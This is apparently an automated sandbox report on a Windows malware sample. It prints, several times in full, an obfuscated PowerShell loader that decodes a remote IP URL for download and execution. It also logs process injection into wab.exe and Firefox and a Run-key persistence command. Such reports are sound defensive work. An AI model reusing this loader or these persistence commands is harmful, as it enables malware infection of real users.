        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtClose: Direct from: 0x77382B6C
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeSection loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\xcopy.exeThread APC queued: target process: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeJump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3240000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 323FA28Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"Jump to behavior
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$retorsionshandlingenllustrationer = 1;$elytrigerous='s';$elytrigerous+='ubstrin';$elytrigerous+='g';function programregningsfunktionens($ridderne){$retorsionshandlingennfraocular=$ridderne.length-$retorsionshandlingenllustrationer;for($retorsionshandlingen=5; $retorsionshandlingen -lt $retorsionshandlingennfraocular; $retorsionshandlingen+=(6)){$outsmokes+=$ridderne.$elytrigerous.invoke( $retorsionshandlingen, $retorsionshandlingenllustrationer);}$outsmokes;}function gracy216($begrendes){. ($antediluvianske) ($begrendes);}$diskoskasteren=programregningsfunktionens 's.perm l deolandszaccomiturbolbrystlsu.loa inte/linje5.ilfo.brneb0b,ddi illi(mamelwkortsiexoranbowkndsp,dho.urvew,ndtrsfjase utotnmileptb,een marga1san.u0balli.montr0h,rsk;.ykke brakpwxanthi ,ervnreprs6trova4filet;d,awc vidnxt,gue6admin4cotra;insci un btrtogstvegipt:inter1riv l2for e1 daun. gens0sknde)neutr trak grepudeguldkc belaktandlov.rde/ edb2uheld0sknhe1elek.0nell,0 ,rot1un,en0skibi1savne mordfautogiko,merde,inearom,fshipbohapaxxstork/inten1splas2ds,es1 ilsk.fylds0capri ';$sprayens=programregningsfunktionens 'nondeu rubasva neebe,kir for -,geblar.bbegholose ta dn paratprivi ';$reprogrammes=programregningsfunktionens 'stuf.hl.muctversit subspcosmo:etcif/taksa/ impl8morph7far,n.bronz1anal,2proc,1ungl .unpol1unper0f,nda5varmt. gr,n5roc,e4,sent/seksaooverrmmismamt.bulelandlsforcetmis,aratropudiscop,iske.aarsadunsanesaanipbrodfldiameonamatysawai ';$kretidseffekternes=programregningsfunktionens 'vejkr>phisa ';$antediluvianske=programregningsfunktionens 'etam.iraadie saddxfasts ';$gunlaying='forraadnelig';gracy216 (programregningsfunktionens ' l urs atikesignatrecon- genecpen,eo.endrnnovumtprintelailanporphtst ir peatw-anglopobitaa elvetsymbohp,esh trvemt,ough: ,aad\ afv i cerid.roldrcheskt udpasfilerfmenneo c,lorsol,cesuavenphaneiindlenaabengseepssunche1pre i9wi,db7super.radiotniveax t rrt duod evole-un mmv selramoraklpericuunmoueadvoc melle$samstg estiu appenre,orl teleaanmrkysaponiimmunn behvgah.eh;chabo ');gracy216 (programregningsfunktionens ' framihabi,fcacos larit( grectv.stfe.olfistalertridge-ozonopju iaastoddttabarhpigl, pse thaand:mosen\kompli .oemd ilker tigeteperoskrig,f collopl.udr subsemad lnnonmoikromgnenok g saxoshaand1 twir9op oe7 lov..fedtst an txfarvet rede) rtss{ ka.me kropxfaksiiudsket sang} un s; gro, ');$kvrne = programregningsfunktionens 'nedraeunconcuan.ghpet oopaatn munke%kys.eacasanpfy,depsixpedover agravit orema ragl%euboe\devels lovgalaa,ngplat snematgbug.gn jalaitegninovercgarbe.esl,knr forsn p.ileafsvo. unshispirinm larth ved .fsla&neonr&be.ri adiabetro ecudganhsvovloeksp trink$ambol ';gracy216 (programregningsfunktionens 'slide$svmnigimperlavn,sot aadb rag,apie alfordr: demivgoogoiquittrshop k trknsmycetofodbomhomemhdr sieeffemd de,isdawsst bf eyoprikpbrancepatrunsongbs thri=nonam(am.utcpillamsulted stev toksi/ ilhecrajah bed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$retorsionshandlingenllustrationer = 1;$elytrigerous='s';$elytrigerous+='ubstrin';$elytrigerous+='g';function programregningsfunktionens($ridderne){$retorsionshandlingennfraocular=$ridderne.length-$retorsionshandlingenllustrationer;for($retorsionshandlingen=5; $retorsionshandlingen -lt $retorsionshandlingennfraocular; $retorsionshandlingen+=(6)){$outsmokes+=$ridderne.$elytrigerous.invoke( $retorsionshandlingen, $retorsionshandlingenllustrationer);}$outsmokes;}function gracy216($begrendes){. ($antediluvianske) ($begrendes);}$diskoskasteren=programregningsfunktionens 's.perm l deolandszaccomiturbolbrystlsu.loa inte/linje5.ilfo.brneb0b,ddi illi(mamelwkortsiexoranbowkndsp,dho.urvew,ndtrsfjase utotnmileptb,een marga1san.u0balli.montr0h,rsk;.ykke brakpwxanthi ,ervnreprs6trova4filet;d,awc vidnxt,gue6admin4cotra;insci un btrtogstvegipt:inter1riv l2for e1 daun. gens0sknde)neutr trak grepudeguldkc belaktandlov.rde/ edb2uheld0sknhe1elek.0nell,0 ,rot1un,en0skibi1savne mordfautogiko,merde,inearom,fshipbohapaxxstork/inten1splas2ds,es1 ilsk.fylds0capri ';$sprayens=programregningsfunktionens 'nondeu rubasva neebe,kir for -,geblar.bbegholose ta dn paratprivi ';$reprogrammes=programregningsfunktionens 'stuf.hl.muctversit subspcosmo:etcif/taksa/ impl8morph7far,n.bronz1anal,2proc,1ungl .unpol1unper0f,nda5varmt. gr,n5roc,e4,sent/seksaooverrmmismamt.bulelandlsforcetmis,aratropudiscop,iske.aarsadunsanesaanipbrodfldiameonamatysawai ';$kretidseffekternes=programregningsfunktionens 'vejkr>phisa ';$antediluvianske=programregningsfunktionens 'etam.iraadie saddxfasts ';$gunlaying='forraadnelig';gracy216 (programregningsfunktionens ' l urs atikesignatrecon- genecpen,eo.endrnnovumtprintelailanporphtst ir peatw-anglopobitaa elvetsymbohp,esh trvemt,ough: ,aad\ afv i cerid.roldrcheskt udpasfilerfmenneo c,lorsol,cesuavenphaneiindlenaabengseepssunche1pre i9wi,db7super.radiotniveax t rrt duod evole-un mmv selramoraklpericuunmoueadvoc melle$samstg estiu appenre,orl teleaanmrkysaponiimmunn behvgah.eh;chabo ');gracy216 (programregningsfunktionens ' framihabi,fcacos larit( grectv.stfe.olfistalertridge-ozonopju iaastoddttabarhpigl, pse thaand:mosen\kompli .oemd ilker tigeteperoskrig,f collopl.udr subsemad lnnonmoikromgnenok g saxoshaand1 twir9op oe7 lov..fedtst an txfarvet rede) rtss{ ka.me kropxfaksiiudsket sang} un s; gro, ');$kvrne = programregningsfunktionens 'nedraeunconcuan.ghpet oopaatn munke%kys.eacasanpfy,depsixpedover agravit orema ragl%euboe\devels lovgalaa,ngplat snematgbug.gn jalaitegninovercgarbe.esl,knr forsn p.ileafsvo. unshispirinm larth ved .fsla&neonr&be.ri adiabetro ecudganhsvovloeksp trink$ambol ';gracy216 (programregningsfunktionens 'slide$svmnigimperlavn,sot aadb rag,apie alfordr: demivgoogoiquittrshop k trknsmycetofodbomhomemhdr sieeffemd de,isdawsst bf eyoprikpbrancepatrunsongbs thri=nonam(am.utcpillamsulted stev toksi/ ilhecrajah bed
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$retorsionshandlingenllustrationer = 1;$elytrigerous='s';$elytrigerous+='ubstrin';$elytrigerous+='g';function programregningsfunktionens($ridderne){$retorsionshandlingennfraocular=$ridderne.length-$retorsionshandlingenllustrationer;for($retorsionshandlingen=5; $retorsionshandlingen -lt $retorsionshandlingennfraocular; $retorsionshandlingen+=(6)){$outsmokes+=$ridderne.$elytrigerous.invoke( $retorsionshandlingen, $retorsionshandlingenllustrationer);}$outsmokes;}function gracy216($begrendes){. ($antediluvianske) ($begrendes);}$diskoskasteren=programregningsfunktionens 's.perm l deolandszaccomiturbolbrystlsu.loa inte/linje5.ilfo.brneb0b,ddi illi(mamelwkortsiexoranbowkndsp,dho.urvew,ndtrsfjase utotnmileptb,een marga1san.u0balli.montr0h,rsk;.ykke brakpwxanthi ,ervnreprs6trova4filet;d,awc vidnxt,gue6admin4cotra;insci un btrtogstvegipt:inter1riv l2for e1 daun. gens0sknde)neutr trak grepudeguldkc belaktandlov.rde/ edb2uheld0sknhe1elek.0nell,0 ,rot1un,en0skibi1savne mordfautogiko,merde,inearom,fshipbohapaxxstork/inten1splas2ds,es1 ilsk.fylds0capri ';$sprayens=programregningsfunktionens 'nondeu rubasva neebe,kir for -,geblar.bbegholose ta dn paratprivi ';$reprogrammes=programregningsfunktionens 'stuf.hl.muctversit subspcosmo:etcif/taksa/ impl8morph7far,n.bronz1anal,2proc,1ungl .unpol1unper0f,nda5varmt. gr,n5roc,e4,sent/seksaooverrmmismamt.bulelandlsforcetmis,aratropudiscop,iske.aarsadunsanesaanipbrodfldiameonamatysawai ';$kretidseffekternes=programregningsfunktionens 'vejkr>phisa ';$antediluvianske=programregningsfunktionens 'etam.iraadie saddxfasts ';$gunlaying='forraadnelig';gracy216 (programregningsfunktionens ' l urs atikesignatrecon- genecpen,eo.endrnnovumtprintelailanporphtst ir peatw-anglopobitaa elvetsymbohp,esh trvemt,ough: ,aad\ afv i cerid.roldrcheskt udpasfilerfmenneo c,lorsol,cesuavenphaneiindlenaabengseepssunche1pre i9wi,db7super.radiotniveax t rrt duod evole-un mmv selramoraklpericuunmoueadvoc melle$samstg estiu appenre,orl teleaanmrkysaponiimmunn behvgah.eh;chabo ');gracy216 (programregningsfunktionens ' framihabi,fcacos larit( grectv.stfe.olfistalertridge-ozonopju iaastoddttabarhpigl, pse thaand:mosen\kompli .oemd ilker tigeteperoskrig,f collopl.udr subsemad lnnonmoikromgnenok g saxoshaand1 twir9op oe7 lov..fedtst an txfarvet rede) rtss{ ka.me kropxfaksiiudsket sang} un s; gro, ');$kvrne = programregningsfunktionens 'nedraeunconcuan.ghpet oopaatn munke%kys.eacasanpfy,depsixpedover agravit orema ragl%euboe\devels lovgalaa,ngplat snematgbug.gn jalaitegninovercgarbe.esl,knr forsn p.ileafsvo. unshispirinm larth ved .fsla&neonr&be.ri adiabetro ecudganhsvovloeksp trink$ambol ';gracy216 (programregningsfunktionens 'slide$svmnigimperlavn,sot aadb rag,apie alfordr: demivgoogoiquittrshop k trknsmycetofodbomhomemhdr sieeffemd de,isdawsst bf eyoprikpbrancepatrunsongbs thri=nonam(am.utcpillamsulted stev toksi/ ilhecrajah bed Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$retorsionshandlingenllustrationer = 1;$elytrigerous='s';$elytrigerous+='ubstrin';$elytrigerous+='g';function programregningsfunktionens($ridderne){$retorsionshandlingennfraocular=$ridderne.length-$retorsionshandlingenllustrationer;for($retorsionshandlingen=5; $retorsionshandlingen -lt $retorsionshandlingennfraocular; $retorsionshandlingen+=(6)){$outsmokes+=$ridderne.$elytrigerous.invoke( $retorsionshandlingen, $retorsionshandlingenllustrationer);}$outsmokes;}function gracy216($begrendes){. ($antediluvianske) ($begrendes);}$diskoskasteren=programregningsfunktionens 's.perm l deolandszaccomiturbolbrystlsu.loa inte/linje5.ilfo.brneb0b,ddi illi(mamelwkortsiexoranbowkndsp,dho.urvew,ndtrsfjase utotnmileptb,een marga1san.u0balli.montr0h,rsk;.ykke brakpwxanthi ,ervnreprs6trova4filet;d,awc vidnxt,gue6admin4cotra;insci un btrtogstvegipt:inter1riv l2for e1 daun. gens0sknde)neutr trak grepudeguldkc belaktandlov.rde/ edb2uheld0sknhe1elek.0nell,0 ,rot1un,en0skibi1savne mordfautogiko,merde,inearom,fshipbohapaxxstork/inten1splas2ds,es1 ilsk.fylds0capri ';$sprayens=programregningsfunktionens 'nondeu rubasva neebe,kir for -,geblar.bbegholose ta dn paratprivi ';$reprogrammes=programregningsfunktionens 'stuf.hl.muctversit subspcosmo:etcif/taksa/ impl8morph7far,n.bronz1anal,2proc,1ungl .unpol1unper0f,nda5varmt. gr,n5roc,e4,sent/seksaooverrmmismamt.bulelandlsforcetmis,aratropudiscop,iske.aarsadunsanesaanipbrodfldiameonamatysawai ';$kretidseffekternes=programregningsfunktionens 'vejkr>phisa ';$antediluvianske=programregningsfunktionens 'etam.iraadie saddxfasts ';$gunlaying='forraadnelig';gracy216 (programregningsfunktionens ' l urs atikesignatrecon- genecpen,eo.endrnnovumtprintelailanporphtst ir peatw-anglopobitaa elvetsymbohp,esh trvemt,ough: ,aad\ afv i cerid.roldrcheskt udpasfilerfmenneo c,lorsol,cesuavenphaneiindlenaabengseepssunche1pre i9wi,db7super.radiotniveax t rrt duod evole-un mmv selramoraklpericuunmoueadvoc melle$samstg estiu appenre,orl teleaanmrkysaponiimmunn behvgah.eh;chabo ');gracy216 (programregningsfunktionens ' framihabi,fcacos larit( grectv.stfe.olfistalertridge-ozonopju iaastoddttabarhpigl, pse thaand:mosen\kompli .oemd ilker tigeteperoskrig,f collopl.udr subsemad lnnonmoikromgnenok g saxoshaand1 twir9op oe7 lov..fedtst an txfarvet rede) rtss{ ka.me kropxfaksiiudsket sang} un s; gro, ');$kvrne = programregningsfunktionens 'nedraeunconcuan.ghpet oopaatn munke%kys.eacasanpfy,depsixpedover agravit orema ragl%euboe\devels lovgalaa,ngplat snematgbug.gn jalaitegninovercgarbe.esl,knr forsn p.ileafsvo. unshispirinm larth ved .fsla&neonr&be.ri adiabetro ecudganhsvovloeksp trink$ambol ';gracy216 (programregningsfunktionens 'slide$svmnigimperlavn,sot aadb rag,apie alfordr: demivgoogoiquittrshop k trknsmycetofodbomhomemhdr sieeffemd de,isdawsst bf eyoprikpbrancepatrunsongbs thri=nonam(am.utcpillamsulted stev toksi/ ilhecrajah bed Jump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
